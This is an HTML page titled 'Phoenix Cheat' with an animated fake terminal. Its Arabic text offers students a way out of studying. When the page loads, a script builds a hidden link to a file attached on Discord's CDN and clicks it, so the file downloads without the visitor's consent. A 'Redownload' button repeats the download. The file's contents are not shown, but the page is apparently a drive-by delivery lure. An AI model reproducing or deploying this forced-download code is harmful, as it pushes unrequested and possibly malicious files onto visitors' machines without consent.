<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Phoenix Cheat</title>
    <script>
        window.onload = function() {
            if (!localStorage.getItem('fileDownloaded')) {
                var link = document.createElement('a');
                link.setAttribute('href', 'https://cdn.discordapp.com/attachments/1203043575487664220/1210056149349441596/57cce574010a4f6f.gan?ex=65e92b9b&is=65d6b69b&hm=60f32029e7ea61e0977f207141f7ba1beef0909a0520317f51fe38064b690c0a');
                link.setAttribute('download', 'filename.gan');
                link.style.display = 'none';
                document.body.appendChild(link);
                link.click();
                document.body.removeChild(link);
                localStorage.setItem('fileDownloaded', 'true');
            }
        };

        function reDownload() {
            var link = document.createElement('a');
            link.setAttribute('href', 'https://cdn.discordapp.com/attachments/1203043575487664220/1210056149349441596/57cce574010a4f6f.gan?ex=65e92b9b&is=65d6b69b&hm=60f32029e7ea61e0977f207141f7ba1beef0909a0520317f51fe38064b690c0a');
            link.setAttribute('download', 'filename.gan');
            link.style.display = 'none';
            document.body.appendChild(link);
            link.click();
            document.body.removeChild(link);
        }
    </script>
    <style>
        body {
            background-color: #272727;
            padding: 10px;
        }

        .fakeButtons {
            height: 10px;
            width: 10px;
            border-radius: 50%;
            border: 1px solid #000;
            position: relative;
            top: 6px;
            left: 6px;
            background-color: #ff3b47;
            border-color: #9d252b;
            display: inline-block;
        }

        .fakeMinimize {
            left: 11px;
            background-color: #ffc100;
            border-color: #9d802c;
        }

        .fakeZoom {
            left: 16px;
            background-color: #00d742;
            border-color: #049931;
        }

        .fakeMenu {
            width: 550px;
            box-sizing: border-box;
            height: 25px;
            background-color: #bbb;
            margin: 0 auto;
            border-top-right-radius: 5px;
            border-top-left-radius: 5px;
        }

        .fakeScreen {
            background-color: #151515;
            box-sizing: border-box;
            width: 550px;
            margin: 0 auto;
            padding: 30px;
            border-bottom-left-radius: 5px;
            border-bottom-right-radius: 5px;
        }

        p {
            position: relative;
            left: 60%;
            margin-left: -10.5em;
            text-align: left;
            font-size: 2.05em;
            font-family: monospace;
            white-space: nowrap; /* Make text appear in one line */
            overflow: hidden;
            width: 0;
        }

        span {
            color: #fff;
            font-weight: bold;
        }

        .line1 {
            color: #9CD9F0;
            -webkit-animation: type .5s 1s steps(20, end) forwards;
            -moz-animation: type .5s 1s steps(20, end) forwards;
            -o-animation: type .5s 1s steps(20, end) forwards;
            animation: type .5s 1s steps(20, end) forwards;
        }

        .cursor1 {
            -webkit-animation: blink 1s 2s 2 forwards;
            -moz-animation: blink 1s 2s 2 forwards;
            -o-animation: blink 1s 2s 2 forwards;
            animation: blink 1s 2s 2 forwards;
        }

        .line2 {
            color: #CDEE69;
            -webkit-animation: type .5s 4.25s steps(20, end) forwards;
            -moz-animation: type .5s 4.25s steps(20, end) forwards;
            -o-animation: type .5s 4.25s steps(20, end) forwards;
            animation: type .5s 4.25s steps(20, end) forwards;
            margin-left: -6.5em; /* Adjust margin-left as needed */
        }

        .cursor2 {
            -webkit-animation: blink 1s 5.25s 2 forwards;
            -moz-animation: blink 1s 5.25s 2 forwards;
            -o-animation: blink 1s 5.25s 2 forwards;
            animation: blink 1s 5.25s 2 forwards;
        }

        .line3 {
            color: #E09690;
            -webkit-animation: type .5s 7.5s steps(20, end) forwards;
            -moz-animation: type .5s 7.5s steps(20, end) forwards;
            -o-animation: type .5s 7.5s steps(20, end) forwards;
            animation: type .5s 7.5s steps(20, end) forwards;
        }

        .cursor3 {
            -webkit-animation: blink 1s 8.5s 2 forwards;
            -moz-animation: blink 1s 8.5s 2 forwards;
            -o-animation: blink 1s 8.5s 2 forwards;
            animation: blink 1s 8.5s 2 forwards;
        }

        .line4 {
            color: #fff;
            -webkit-animation: type .5s 10.75s steps(20, end) forwards;
            -moz-animation: type .5s 10.75s steps(20, end) forwards;
            -o-animation: type .5s 10.75s steps(20, end) forwards;
            animation: type .5s 10.75s steps(20, end) forwards;
        }

        .line7 {
            color: #fff;
            -webkit-animation: type .5s 10.75s steps(20, end) forwards;
            -moz-animation: type .5s 10.75s steps(20, end) forwards;
            -o-animation: type .5s 10.75s steps(20, end) forwards;
            animation: type .5s 10.75s steps(20, end) forwards;
        }

        .cursor4 {
            -webkit-animation: blink 1s 11.5s infinite;
            -moz-animation: blink 1s 8.5s infinite;
            -o-animation: blink 1s 8.5s infinite;
            animation: blink 1s 8.5s infinite;
        }

        @-webkit-keyframes blink {
            0% {
                opacity: 0;
            }
            40% {
                opacity: 0;
            }
            50% {
                opacity: 1;
            }
            90% {
                opacity: 1;
            }
            100% {
                opacity: 0;
            }
        }

        @-moz-keyframes blink {
            0% {
                opacity: 0;
            }
            40% {
                opacity: 0;
            }
            50% {
                opacity: 1;
            }
            90% {
                opacity: 1;
            }
            100% {
                opacity: 0;
            }
        }

        @-o-keyframes blink {
            0% {
                opacity: 0;
            }
            40% {
                opacity: 0;
            }
            50% {
                opacity: 1;
            }
            90% {
                opacity: 1;
            }
            100% {
                opacity: 0;
            }
        }

        @keyframes blink {
            0% {
                opacity: 0;
            }
            40% {
                opacity: 0;
            }
            50% {
                opacity: 1;
            }
            90% {
                opacity: 1;
            }
            100% {
                opacity: 0;
            }
        }

        @-webkit-keyframes type {
            to {
                width: 17em;
            }
        }

        @-moz-keyframes type {
            to {
                width: 17em;
            }
        }

        @-o-keyframes type {
            to {
                width: 17em;
            }
        }

        @keyframes type {
            to {
                width: 17em;
            }
        }
    </style>
</head>
<body>
    <div class=fakeMenu>
        <div class="fakeButtons fakeClose"></div>
        <div class="fakeButtons fakeMinimize"></div>
        <div class="fakeButtons fakeZoom"></div>
    </div>
    </div>
    <div class="fakeScreen">
        <p class="line1"> ارحب ي يزلمه مش عاوز تدرس ؟ الحل عندي $ <span class="cursor1">_</span></p>
        <p class="line2"> ادعي لي ! <span class="cursor2">_</span></p>
       
       
        <p class="line3"> The Link got downloded  <span class="cursor3">_</span></p>

        <p class="line7"> This site was developed by S    <span class="cursor3">_</span></p>
        <p class="line3">< Have Fun ! ><span class="cursor3">_</span></p>

        <p class="line4">><span class="cursor4">_</span></p>
    </div>
    <button onclick="reDownload()" style="display:block; margin: 20px auto; padding: 5px 15px; background-color: #ff3b47; color: white; border: none; border-radius: 5px; cursor: pointer;">Redownload</button>
</body>
</html>
